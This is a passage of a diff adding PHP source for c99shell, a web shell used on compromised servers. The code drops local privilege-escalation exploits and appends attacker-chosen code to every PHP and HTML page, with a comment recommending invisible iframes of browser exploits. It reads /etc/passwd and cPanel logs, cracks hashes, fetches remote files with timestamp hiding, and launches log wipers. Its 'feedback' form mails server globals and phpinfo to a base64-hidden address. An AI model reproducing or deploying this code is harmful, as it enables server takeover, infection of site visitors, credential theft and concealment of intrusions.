+				cf('h00lyshit', $h00lyshit);
+				echo htmlentities('h00lyshit was created in the script directory.  Now go find/make a 100mb file and execute "./h00lyshit <path_to_100mb_file>".');
+			}else{
+				echo 'Directory Is Not Writable!<br>';
+			}
+		} // end if h00lyshit was called
+?>
+<br><br>
+<a href="<?php echo $surl; ?>act=exploits&sploit=raptorchown">raptor_chown - Group Modification Exploit</a>
+<?php
+		if ($_GET['sploit'] == 'raptorchown') {
+			if (is_writable('.')) {
+				cf('raptor_chown', $raptorchown);
+				echo htmlentities('raptor_chown was created in the script directory.  Now execute "./raptor_chown <path_to_file_you_want_to_edit_group_of>".');
+			}else{
+				echo 'Directory Is Not Writable!<br>';
+			}
+		} // end if raptor_chown was called
+
+
+} // end if exploits is called
+if ($act == 'massbrowsersploit') {
+?>
+<b>Mass Code Injection:</b><br><br>
+Use this to add HTML to the end of every .php, .htm, and .html page in the directory specified.<br><br>
+<form action="<?php echo $surl; ?>" method=GET>
+<input type=hidden name="masssploit" value="goahead">
+<input type=hidden name="act" value="massbrowsersploit">
+<table border=0>
+<tr><td>Dir to inject: </td><td><input type=text size=50 name="pathtomass" value="<?php echo realpath('.'); ?>"> <-- default is dir this shell is in</td></tr>
+<tr><td>Code to inject: </td><td><textarea name="injectthis" cols=50 rows=4><?php echo htmlspecialchars('<IFRAME src="http://www.google.com" width=0 height=0 frameborder=0></IFRAME>'); ?></textarea> <-- best bet would be to include an invisible iframe of browser exploits</td></tr>
+<tr><td><input type=submit value="Inject Code"></td></tr>
+</table>
+</form>
+<?php
+if ($_GET['masssploit'] == 'goahead') {
+	if (is_dir($_GET['pathtomass'])) {
+		$lolinject = $_GET['injectthis'];
+		foreach (glob($_GET['pathtomass']."/*.php") as $injectj00) {
+			$fp=fopen($injectj00,"a+");
+			if (fputs($fp,$lolinject)){
+				echo $injectj00.' was injected<br>';
+			} else {
+				echo '<font color=red>failed to inject '.$injectj00.'</font>';
+			}
+		}
+		foreach (glob($_GET['pathtomass']."/*.htm") as $injectj00) {
+			$fp=fopen($injectj00,"a+");
+			if (fputs($fp,$lolinject)){
+				echo $injectj00.' was injected<br>';
+			} else {
+				echo '<font color=red>failed to inject '.$injectj00.'</font>';
+			}
+		}
+		foreach (glob($_GET['pathtomass']."/*.html") as $injectj00) {
+			$fp=fopen($injectj00,"a+");
+			if (fputs($fp,$lolinject)){
+				echo $injectj00.' was injected<br>';
+			} else {
+				echo '<font color=red>failed to inject '.$injectj00.'</font>';
+			}
+		}
+	} else { //end if inputted dir is real -- if not, show an ugly red error
+		echo '<b><font color=red>'.$_GET['pathtomass'].' is not available!</font></b>';
+	} // end if inputted dir is real, for real this time
+} // end if confirmation to mass sploit is go
+} // end if massbrowsersploit is called
+
+if ($act == 'security')
+{ 
+ echo "<center><b>Server security information:</b></center><b>Open base dir: ".$hopenbasedir."</b><br>"; 
+ if (!$win) 
+ { 
+  if ($nixpasswd) 
+  { 
+   if ($nixpasswd == 1) {$nixpasswd = 0;} 
+   echo "<b>*nix /etc/passwd:</b><br>"; 
+   if (!is_numeric($nixpwd_s)) {$nixpwd_s = 0;} 
+   if (!is_numeric($nixpwd_e)) {$nixpwd_e = $nixpwdperpage;} 
+   echo "<form action=\"".$surl."\"><input type=hidden name=act value=\"security\"><input type=hidden name=\"nixpasswd\" value=\"1\"><b>From:</b>&nbsp;<input type=\"text=\" name=\"nixpwd_s\" value=\"".$nixpwd_s."\">&nbsp;<b>To:</b>&nbsp;<input type=\"text\" name=\"nixpwd_e\" value=\"".$nixpwd_e."\">&nbsp;<input type=submit value=\"View\"></form><br>"; 
+   $i = $nixpwd_s; 
+   while ($i < $nixpwd_e) 
+   { 
+    $uid = posix_getpwuid($i); 
+    if ($uid) 
+    { 
+     $uid["dir"] = "<a href=\"".$surl."act=ls&d=".urlencode($uid["dir"])."\">".$uid["dir"]."</a>"; 
+     echo join(":",$uid)."<br>"; 
+    } 
+    $i++; 
+   } 
+  } 
+  else {echo "<br><a href=\"".$surl."act=security&nixpasswd=1&d=".$ud."\"><b><u>Get /etc/passwd</u></b></a><br>";} 
+ if (file_get_contents("/etc/userdomains")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=userdomains&d=".urlencode("/etc")."&ft=txt\"><u><b>View cpanel user-domains logs</b></u></a></font></b><br>";} 
+ if (file_get_contents("/var/cpanel/accounting.log")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=accounting.log&d=".urlencode("/var/cpanel/")."\"&ft=txt><u><b>View cpanel logs</b></u></a></font></b><br>";} 
+ if (file_get_contents("/usr/local/apache/conf/httpd.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=httpd.conf&d=".urlencode("/usr/local/apache/conf")."&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";} 
+ if (file_get_contents("/etc/httpd.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=httpd.conf&d=".urlencode("/etc")."&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";} 
+ if (file_get_contents("/etc/syslog.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=syslog.conf&d=".urlencode("/etc")."&ft=txt\"><u><b>Syslog configuration (syslog.conf)</b></u></a></font></b><br>";} 
+ if (file_get_contents("/etc/motd")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=motd&d=".urlencode("/etc")."&ft=txt\"><u><b>Message Of The Day</b></u></a></font></b><br>";} 
+ if (file_get_contents("/etc/hosts")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=hosts&d=".urlencode("/etc")."&ft=txt\"><u><b>Hosts</b></u></a></font></b><br>";} 
+ function displaysecinfo($name,$value) {if (!empty($value)) {if (!empty($name)) {$name = "<b>".$name." - </b>";} echo $name.nl2br($value)."<br>";}} 
+ displaysecinfo("OS Version?",myshellexec("cat /proc/version")); 
+ displaysecinfo("Kernel version?",myshellexec("sysctl -a | grep version")); 
+ displaysecinfo("Distrib name",myshellexec("cat /etc/issue.net")); 
+ displaysecinfo("Distrib name (2)",myshellexec("cat /etc/*-realise")); 
+ displaysecinfo("CPU?",myshellexec("cat /proc/cpuinfo")); 
+ displaysecinfo("RAM",myshellexec("free -m")); 
+ displaysecinfo("HDD space",myshellexec("df -h")); 
+ displaysecinfo("List of Attributes",myshellexec("lsattr -a")); 
+ displaysecinfo("Mount options ",myshellexec("cat /etc/fstab")); 
+ displaysecinfo("Is cURL installed?",myshellexec("which curl")); 
+ displaysecinfo("Is lynx installed?",myshellexec("which lynx")); 
+ displaysecinfo("Is links installed?",myshellexec("which links")); 
+ displaysecinfo("Is fetch installed?",myshellexec("which fetch")); 
+ displaysecinfo("Is GET installed?",myshellexec("which GET")); 
+ displaysecinfo("Is perl installed?",myshellexec("which perl")); 
+ displaysecinfo("Where is apache",myshellexec("whereis apache")); 
+ displaysecinfo("Where is perl?",myshellexec("whereis perl")); 
+ displaysecinfo("locate proftpd.conf",myshellexec("locate proftpd.conf")); 
+ displaysecinfo("locate httpd.conf",myshellexec("locate httpd.conf")); 
+ displaysecinfo("locate my.conf",myshellexec("locate my.conf")); 
+ displaysecinfo("locate psybnc.conf",myshellexec("locate psybnc.conf")); 
+ } 
+ else
+ {
+exec('systeminfo', $wininfo);
+?>
+<br>DOS command: <b>systeminfo</b><br>
+<textarea cols=125 rows=<?php echo count($wininfo); ?>><?php
+if ($wininfo) {
+	foreach($wininfo as $row)
+		echo $row."\n";
+} else { // if systeminfo failed
+	echo 'Couldn\'t execute command!';
+}
+?>
+</textarea>
+<?php
+ }
+
+} 
+if ($act == 'mkfile') 
+{ 
+ if ($mkfile != $d) 
+ { 
+  if (file_exists($mkfile)) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: object alredy exists";} 
+  elseif (!fopen($mkfile,'w')) {echo '<b>Make File "'.htmlspecialchars($mkfile).'"</b>: access denied';} 
+  else {$act = 'f'; $d = dirname($mkfile); if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} $f = basename($mkfile);} 
+ } 
+ else {$act = $dspact = 'ls';} 
+} 
+if ($act == 'encoder')
+{
+ echo "<script>function set_encoder_input(text) {document.forms.encoder.input.value = text;}</script><center><b>Encoder:</b></center><form name=\"encoder\" action=\"".$surl."\" method=POST><input type=hidden name=act value=encoder><b>Input:</b><center><textarea name=\"encoder_input\" id=\"input\" cols=50 rows=5>".@htmlspecialchars($encoder_input)."</textarea><br><br><input type=submit value=\"calculate\"><br><br></center><b>Hashes</b>:<br><center>"; 
+ foreach(array("md5","crypt","sha1","crc32") as $v) 
+ { 
+  echo $v." - <input type=text size=50 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$v($encoder_input)."\" readonly><br>"; 
+ } 
+ echo "</center><b>Url:</b><center><br>urlencode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".urlencode($encoder_input)."\" readonly> 
+ <br>urldecode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".htmlspecialchars(urldecode($encoder_input))."\" readonly> 
+ <br></center><b>Base64:</b><center>base64_encode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".base64_encode($encoder_input)."\" readonly></center>"; 
+ echo "<center>base64_decode - "; 
+ if (base64_encode(base64_decode($encoder_input)) != $encoder_input) {echo "<input type=text size=35 value=\"failed\" disabled readonly>";} 
+ else 
+ { 
+  $debase64 = base64_decode($encoder_input); 
+  $debase64 = str_replace("\0","[0]",$debase64); 
+  $a = explode("\r\n",$debase64); 
+  $rows = count($a); 
+  $debase64 = htmlspecialchars($debase64); 
+  if ($rows == 1) {echo "<input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$debase64."\" id=\"debase64\" readonly>";} 
+  else {$rows++; echo "<textarea cols=\"40\" rows=\"".$rows."\" onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" id=\"debase64\" readonly>".$debase64."</textarea>";} 
+  echo "&nbsp;<a href=\"#\" onclick=\"set_encoder_input(document.forms.encoder.debase64.value)\"><b>^</b></a>"; 
+ } 
+ echo "</center><br><b>Base convertations</b>:<center>dec2hex - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\""; 
+ $c = strlen($encoder_input); 
+ for($i=0;$i<$c;$i++) 
+ { 
+  $hex = dechex(ord($encoder_input[$i])); 
+  if ($encoder_input[$i] == "&") {echo $encoder_input[$i];} 
+  elseif ($encoder_input[$i] != "\\") {echo "%".$hex;} 
+ } 
+ echo "\" readonly><br></form>"; 
+
+?>
+</center>
+<br><br>
+<table border=0 align=center cellpadding=4>
+<tr><td>
+<center><b>Search milw0rm for MD5 hash</b></center>
+</td><td>
+<center><b>Search md5encryption.com for MD5 or SHA1 hash</b></center>
+</td><td>
+<center><b>Search CsTeam for MD5 hash</b></center>
+</td></tr>
+<tr><td>
+<center>
+<form target="_blank" action="http://www.milw0rm.com/cracker/search.php" method=POST>
+<input type=text size=40 name=hash> <input type=submit value="Submit"></form>
+</center>
+</td><td>
+<center>
+<form target="_blank" action="http://www.md5encryption.com/?mod=decrypt" method=POST>
+<input type=text size=40 name=hash2word> <input type=submit value="Submit"></form>
+</center>
+</td><td>
+<center>
+<form target="_blank" action="http://www.csthis.com/md5/index.php" method=POST>
+<input type=text size=40 name=h> <input type=submit value="Submit"></form>
+</center>
+</td></tr>
+</table>
+<br>
+<center>
+<b>Wordlist Hash Cracker</b><br><br>
+<form action="<?php echo $surl; ?>" method=GET>
+<input type=hidden name="act" value="encoder">
+<input type=hidden name="d" value="<?php echo $d; ?>">
+Enter hash: <input type=text width=300 name="hash" size=40>
+<br>
+Wordlist: <input type=text name="wordlist" size=40>
+<br>
+Type: <select name="type">
+<option value="md5">MD5</option>
+<option value="sha1">SHA1</option>
+</select> <input type=submit value="Crack Hash">
+</form>
+</center>
+<?php
+// my wordlist cracker ^_^
+if (isset($_GET['hash']) && isset($_GET['wordlist']) && ($_GET['type'] == 'md5' || $_GET['type'] == 'sha1')) {
+	$type = $_GET['type'];
+	$hash = $_GET['hash'];
+	$count = 1;
+	$wordlist = file($_GET['wordlist']);
+	$words = count($wordlist);
+	foreach ($wordlist as $word) {
+		echo $count.' of '.$words.': '.$word.'<br>';
+		if ($hash == $type(rtrim($word))) {
+			echo '<font color=red>Great success!  The password is: '.$word.'</font><br>';
+			exit;
+		}
+		++$count;
+	}
+}
+
+} 
+if ($act == 'fsbuff') 
+{ 
+ $arr_copy = $sess_data["copy"]; 
+ $arr_cut = $sess_data["cut"]; 
+ $arr = array_merge($arr_copy,$arr_cut); 
+ if (count($arr) == 0) {echo "<center><b>Buffer is empty!</b></center>";} 
+ else {echo "<b>File-System buffer</b><br><br>"; $ls_arr = $arr; $disp_fullpath = TRUE; $act = "ls";} 
+} 
+if ($act == "selfremove") 
+{ 
+ if (($submit == $rndcode) and ($submit != "")) 
+ { 
+  if (unlink(__FILE__)) {@ob_clean(); echo "Thanks for using c99shell v.".$shver."!"; c99shexit(); } 
+  else {echo "<center><b>Can't delete ".__FILE__."!</b></center>";} 
+ } 
+ else 
+ { 
+  if (!empty($rndcode)) {echo "<b>Error: incorrect confimation!</b>";} 
+  $rnd = rand(0,9).rand(0,9).rand(0,9); 
+  echo "<form action=\"".$surl."\"><input type=hidden name=act value=selfremove><b>Self-remove: ".__FILE__." <br><b>Are you sure?<br>For confirmation, enter \"".$rnd."\"</b>:&nbsp;<input type=hidden name=rndcode value=\"".$rnd."\"><input type=text name=submit>&nbsp;<input type=submit value=\"YES\"></form>"; 
+ } 
+} 
+if ($act == "update") {$ret = c99sh_getupdate(!!$confirmupdate); echo "<b>".$ret."</b>"; if (stristr($ret,"new version")) {echo "<br><br><input type=button onclick=\"location.href='".$surl."act=update&confirmupdate=1';\" value=\"Update now\">";}} 
+if ($act == "feedback") 
+{ 
+ $suppmail = base64_decode("Yzk5c2hlbGxAY2N0ZWFtLnJ1"); 
+ if (!empty($submit)) 
+ { 
+  $ticket = substr(md5(microtime()+rand(1,1000)),0,6); 
+  $body = "c99shell v.".$shver." feedback #".$ticket."\nName: ".htmlspecialchars($fdbk_name)."\nE-mail: ".htmlspecialchars($fdbk_email)."\nMessage:\n".htmlspecialchars($fdbk_body)."\n\nIP: ".$REMOTE_ADDR; 
+  if (!empty($fdbk_ref)) 
+  { 
+   $tmp = @ob_get_contents(); 
+   ob_clean(); 
+   phpinfo(); 
+   $phpinfo = base64_encode(ob_get_contents()); 
+   ob_clean(); 
+   echo $tmp; 
+   $body .= "\n"."phpinfo(): ".$phpinfo."\n"."\$GLOBALS=".base64_encode(serialize($GLOBALS))."\n"; 
+  } 
+  mail($suppmail,"c99shell v.".$shver." feedback #".$ticket,$body,"FROM: ".$suppmail); 
+  echo "<center><b>Thanks for your feedback! Your ticket ID: ".$ticket.".</b></center>"; 
+ } 
+ else {echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=feedback><b>Feedback or report bug (".str_replace(array("@","."),array("[at]","[dot]"),$suppmail)."):<br><br>Your name: <input type=\"text\" name=\"fdbk_name\" value=\"".htmlspecialchars($fdbk_name)."\"><br><br>Your e-mail: <input type=\"text\" name=\"fdbk_email\" value=\"".htmlspecialchars($fdbk_email)."\"><br><br>Message:<br><textarea name=\"fdbk_body\" cols=80 rows=10>".htmlspecialchars($fdbk_body)."</textarea><input type=\"hidden\" name=\"fdbk_ref\" value=\"".urlencode($HTTP_REFERER)."\"><br><br>Attach server-info * <input type=\"checkbox\" name=\"fdbk_servinf\" value=\"1\" checked><br><br>There are no checking in the form.<br><br>* - strongly recommended, if you report bug, because we need it for bug-fix.<br><br>We understand languages: English, Russian.<br><br><input type=\"submit\" name=\"submit\" value=\"Send\"></form>";} 
+} 
+if ($act == "search") 
+{ 
+ echo "<b>Search in file-system:</b><br>"; 
+ if (empty($search_in)) {$search_in = $d;} 
+ if (empty($search_name)) {$search_name = "(.*)"; $search_name_regexp = 1;} 
+ if (empty($search_text_wwo)) {$search_text_regexp = 0;} 
+ if (!empty($submit)) 
+ { 
+  $found = array(); 
+  $found_d = 0; 
+  $found_f = 0; 
+  $search_i_f = 0; 
+  $search_i_d = 0; 
+  $a = array 
+  ( 
+   "name"=>$search_name, "name_regexp"=>$search_name_regexp, 
+   "text"=>$search_text, "text_regexp"=>$search_text_regxp, 
+   "text_wwo"=>$search_text_wwo, 
+   "text_cs"=>$search_text_cs, 
+   "text_not"=>$search_text_not 
+  ); 
+  $searchtime = getmicrotime(); 
+  $in = array_unique(explode(";",$search_in)); 
+  foreach($in as $v) {c99fsearch($v);} 
+  $searchtime = round(getmicrotime()-$searchtime,4); 
+  if (count($found) == 0) {echo "<b>No files found!</b>";} 
+  else 
+  { 
+   $ls_arr = $found; 
+   $disp_fullpath = TRUE; 
+   $act = "ls"; 
+  } 
+ } 
+ echo "<form method=POST> 
+<input type=hidden name=\"d\" value=\"".$dispd."\"><input type=hidden name=act value=\"".$dspact."\"> 
+<b>Search for (file/folder name): </b><input type=\"text\" name=\"search_name\" size=\"".round(strlen($search_name)+25)."\" value=\"".htmlspecialchars($search_name)."\">&nbsp;<input type=\"checkbox\" name=\"search_name_regexp\" value=\"1\" ".($search_name_regexp == 1?" checked":"")."> - regexp 
+<br><b>Search in (explode \";\"): </b><input type=\"text\" name=\"search_in\" size=\"".round(strlen($search_in)+25)."\" value=\"".htmlspecialchars($search_in)."\"> 
+<br><br><b>Text:</b><br><textarea name=\"search_text\" cols=\"122\" rows=\"10\">".htmlspecialchars($search_text)."</textarea> 
+<br><br><input type=\"checkbox\" name=\"search_text_regexp\" value=\"1\" ".($search_text_regexp == 1?" checked":"")."> - regexp 
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_wwo\" value=\"1\" ".($search_text_wwo == 1?" checked":"")."> - <u>w</u>hole words only 
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_cs\" value=\"1\" ".($search_text_cs == 1?" checked":"")."> - cas<u>e</u> sensitive 
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_not\" value=\"1\" ".($search_text_not == 1?" checked":"")."> - find files <u>NOT</u> containing the text 
+<br><br><input type=submit name=submit value=\"Search\"></form>"; 
+ if ($act == 'ls') {$dspact = $act; echo "<hr size=\"1\" noshade><b>Search took ".$searchtime." secs (".$search_i_f." files and ".$search_i_d." folders, ".round(($search_i_f+$search_i_d)/$searchtime,4)." objects per second).</b><br><br>";} 
+} 
+if ($act == 'chmod') 
+{ 
+ $mode = fileperms($d.$f); 
+ if (!$mode) {echo "<b>Change file-mode with error:</b> can't get current value.";} 
+ else 
+ { 
+  $form = TRUE; 
+  if ($chmod_submit) 
+  { 
+   $octet = "0".base_convert(($chmod_o["r"]?1:0).($chmod_o["w"]?1:0).($chmod_o["x"]?1:0).($chmod_g["r"]?1:0).($chmod_g["w"]?1:0).($chmod_g["x"]?1:0).($chmod_w["r"]?1:0).($chmod_w["w"]?1:0).($chmod_w["x"]?1:0),2,8); 
+   if (chmod($d.$f,$octet)) {$act = "ls"; $form = FALSE; $err = "";} 
+   else {$err = "Can't chmod to ".$octet.".";} 
+  } 
+  if ($form) 
+  { 
+   $perms = parse_perms($mode); 
+   echo "<b>Changing file-mode (".$d.$f."), ".view_perms_color($d.$f)." (".substr(decoct(fileperms($d.$f)),-4,4).")</b><br>".($err?"<b>Error:</b> ".$err:"")."<form action=\"".$surl."\" method=POST><input type=hidden name=d value=\"".htmlspecialchars($d)."\"><input type=hidden name=f value=\"".htmlspecialchars($f)."\"><input type=hidden name=act value=chmod><table align=left width=300 border=0 cellspacing=0 cellpadding=5><tr><td><b>Owner</b><br><br><input type=checkbox NAME=chmod_o[r] value=1".($perms["o"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox name=chmod_o[w] value=1".($perms["o"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_o[x] value=1".($perms["o"]["x"]?" checked":"").">eXecute</td><td><b>Group</b><br><br><input type=checkbox NAME=chmod_g[r] value=1".($perms["g"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_g[w] value=1".($perms["g"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_g[x] value=1".($perms["g"]["x"]?" checked":"").">eXecute</font></td><td><b>World</b><br><br><input type=checkbox NAME=chmod_w[r] value=1".($perms["w"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_w[w] value=1".($perms["w"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_w[x] value=1".($perms["w"]["x"]?" checked":"").">eXecute</font></td></tr><tr><td><input type=submit name=chmod_submit value=\"Save\"></td></tr></table></form>"; 
+  } 
+ } 
+} 
+if ($act == "upload") 
+{ 
+ $uploadmess = ""; 
+ $uploadpath = str_replace("\\",DIRECTORY_SEPARATOR,$uploadpath); 
+ if (empty($uploadpath)) {$uploadpath = $d;} 
+ elseif (substr($uploadpath,-1) != "/") {$uploadpath .= "/";} 
+ if (!empty($submit)) 
+ { 
+  global $HTTP_POST_FILES; 
+  $uploadfile = $HTTP_POST_FILES["uploadfile"]; 
+  if (!empty($uploadfile["tmp_name"])) 
+  { 
+   if (empty($uploadfilename)) {$destin = $uploadfile["name"];} 
+   else {$destin = $userfilename;} 
+   if (!move_uploaded_file($uploadfile["tmp_name"],$uploadpath.$destin)) {$uploadmess .= "Error uploading file ".$uploadfile["name"]." (can't copy \"".$uploadfile["tmp_name"]."\" to \"".$uploadpath.$destin."\"!<br>";} 
+  } 
+  elseif (!empty($uploadurl)) 
+  { 
+   if (!empty($uploadfilename)) {$destin = $uploadfilename;} 
+   else 
+   { 
+    $destin = explode("/",$destin); 
+    $destin = $destin[count($destin)-1]; 
+    if (empty($destin)) 
+    { 
+     $i = 0; 
+     $b = ""; 
+     while(file_exists($uploadpath.$destin)) {if ($i > 0) {$b = "_".$i;} $destin = "index".$b.".html"; $i++;}} 
+   } 
+   if ((!eregi("http://",$uploadurl)) and (!eregi("https://",$uploadurl)) and (!eregi("ftp://",$uploadurl))) {echo "<b>Incorect url!</b><br>";} 
+   else 
+   { 
+    $st = getmicrotime(); 
+    $content = @file_get_contents($uploadurl); 
+    $dt = round(getmicrotime()-$st,4); 
+    if (!$content) {$uploadmess .=  "Can't download file!<br>";} 
+    else 
+    { 
+     if ($filestealth) {$stat = stat($uploadpath.$destin);} 
+     $fp = fopen($uploadpath.$destin,"w"); 
+     if (!$fp) {$uploadmess .= "Error writing to file ".htmlspecialchars($destin)."!<br>";} 
+     else 
+     { 
+      fwrite($fp,$content,strlen($content)); 
+      fclose($fp); 
+      if ($filestealth) {touch($uploadpath.$destin,$stat[9],$stat[8]);} 
+     } 
+    } 
+   } 
+  } 
+ } 
+ if ($miniform) 
+ { 
+  echo "<b>".$uploadmess."</b>"; 
+  $act = "ls"; 
+ } 
+ else 
+ { 
+  echo "<b>File upload:</b><br><b>".$uploadmess."</b><form enctype=\"multipart/form-data\" action=\"".$surl."act=upload&d=".urlencode($d)."\" method=POST> 
+Select file on your local computer: <input name=\"uploadfile\" type=\"file\"><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;or<br> 
+Input URL: <input name=\"uploadurl\" type=\"text\" value=\"".htmlspecialchars($uploadurl)."\" size=\"70\"><br><br> 
+Save this file dir: <input name=\"uploadpath\" size=\"70\" value=\"".$dispd."\"><br><br> 
+File-name (auto-fill): <input name=uploadfilename size=25><br><br> 
+<input type=checkbox name=uploadautoname value=1 id=df4>&nbsp;convert file name to lovercase<br><br> 
+<input type=submit name=submit value=\"Upload\"> 
+</form>"; 
+ } 
+} 
+if ($act == 'md5file') {
+?>
+<center><b>MD5 Checksum:</b></center><br>
+<table border=0 align=center>
+<?php
+	foreach ($actbox as $v)
+		echo '<tr><td>'.md5_file($v).'</td><td>'.$v.'</td></tr>';
+echo "</table></td></tr></table><br><TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgcolor=#000000 borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">";
+	$act = 'ls';
+}
+if ($act == 'sha1file') {
+?>
+<center><b>SHA1 Checksum:</b></center><br>
+<table border=0 align=center>
+<?php
+	foreach ($actbox as $v)
+		echo '<tr><td>'.sha1_file($v).'</td><td>'.$v.'</td></tr>';
+echo "</table></td></tr></table><br><TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgcolor=#000000 borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">";
+	$act = 'ls';
+}
+if ($act == 'delete')
+{
+ $delerr = '';
+ foreach ($actbox as $v) 
+ { 
+  $result = FALSE; 
+  $result = fs_rmobj($v); 
+  if (!$result)
+	$delerr .= 'Can\'t delete '.htmlspecialchars($v).'<br>'; 
+ } 
+ if (!empty($delerr))
+	echo '<b>Deleting with errors:</b><br>'.$delerr;
+ $act = 'ls';
+} 
+if (!$usefsbuff) 
+{ 
+ if (($act == "paste") or ($act == "copy") or ($act == "cut") or ($act == "unselect")) {echo "<center><b>Sorry, buffer is disabled. For enable, set directive \"\$useFSbuff\" as TRUE.</center>";} 
+} 
+else 
+{ 
+ if ($act == "copy") {$err = ""; $sess_data["copy"] = array_merge($sess_data["copy"],$actbox); c99_sess_put($sess_data); $act = "ls"; } 
+ elseif ($act == "cut") {$sess_data["cut"] = array_merge($sess_data["cut"],$actbox); c99_sess_put($sess_data); $act = "ls";} 
+ elseif ($act == "unselect") {foreach ($sess_data["copy"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["copy"][$k]);}} foreach ($sess_data["cut"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["cut"][$k]);}} c99_sess_put($sess_data); $act = "ls";} 
+ if ($actemptybuff) {$sess_data["copy"] = $sess_data["cut"] = array(); c99_sess_put($sess_data);} 
+ elseif ($actpastebuff) 
+ { 
+  $psterr = ""; 
+  foreach($sess_data["copy"] as $k=>$v) 
+  { 
+   $to = $d.basename($v); 
+   if (!fs_copy_obj($v,$to)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";} 
+   if ($copy_unset) {unset($sess_data["copy"][$k]);} 
+  } 
+  foreach($sess_data["cut"] as $k=>$v) 
+  { 
+   $to = $d.basename($v); 
+   if (!fs_move_obj($v,$to)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";} 
+   unset($sess_data["cut"][$k]); 
+  } 
+  c99_sess_put($sess_data); 
+  if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;} 
+  $act = "ls"; 
+ } 
+ elseif ($actarcbuff) 
+ { 
+  $arcerr = ""; 
+  if (substr($actarcbuff_path,-7,7) == ".tar.gz") {$ext = ".tar.gz";} 
+  else {$ext = ".tar.gz";} 
+  if ($ext == ".tar.gz") {$cmdline = "tar cfzv";} 
+  $cmdline .= " ".$actarcbuff_path; 
+  $objects = array_merge($sess_data["copy"],$sess_data["cut"]); 
+  foreach($objects as $v) 
+  { 
+   $v = str_replace("\\",DIRECTORY_SEPARATOR,$v); 
+   if (substr($v,0,strlen($d)) == $d) {$v = basename($v);} 
+   if (is_dir($v)) 
+   { 
+    if (substr($v,-1) != DIRECTORY_SEPARATOR) {$v .= DIRECTORY_SEPARATOR;} 
+    $v .= "*"; 
+   } 
+   $cmdline .= " ".$v; 
+  } 
+  $tmp = realpath("."); 
+  chdir($d); 
+  $ret = myshellexec($cmdline); 
+  chdir($tmp); 
+  if (empty($ret)) {$arcerr .= "Can't call archivator (".htmlspecialchars(str2mini($cmdline,60)).")!<br>";} 
+  $ret = str_replace("\r\n","\n",$ret); 
+  $ret = explode("\n",$ret); 
+  if ($copy_unset) {foreach($sess_data["copy"] as $k=>$v) {unset($sess_data["copy"][$k]);}} 
+  foreach($sess_data["cut"] as $k=>$v) 
+  { 
+   if (in_array($v,$ret)) {fs_rmobj($v);} 
+   unset($sess_data["cut"][$k]); 
+  } 
+  c99_sess_put($sess_data); 
+  if (!empty($arcerr)) {echo "<b>Archivation errors:</b><br>".$arcerr;} 
+  $act = "ls"; 
+ } 
+ elseif ($actpastebuff) 
+ { 
+  $psterr = ""; 
+  foreach($sess_data["copy"] as $k=>$v) 
+  { 
+   $to = $d.basename($v); 
+   if (!fs_copy_obj($v,$d)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";} 
+   if ($copy_unset) {unset($sess_data["copy"][$k]);} 
+  } 
+  foreach($sess_data["cut"] as $k=>$v) 
+  { 
+   $to = $d.basename($v); 
+   if (!fs_move_obj($v,$d)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";} 
+   unset($sess_data["cut"][$k]); 
+  } 
+  c99_sess_put($sess_data); 
+  if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;} 
+  $act = "ls"; 
+ } 
+}
+// the wipe logs stuff needs to be before cmd, because it will change the $act if the write is successful
+if ($act == 'miglc' || $act == 'zap2') { // *nix cleaners
+	if (is_writable('.')) {
+		cf($act, $$act); // 'tis pure innovation of optimization :)
+		$cmd = './'.$act; // keep this before $act = 'cmd';
+		$act = 'cmd';
+		$cmd_txt = '1';
+	}else{
+		echo 'Directory Is Not Writable!<br>';
+	}
+}
+if ($act == 'clearlogs') { // windows cleaners
+	if (is_writable('.')) {
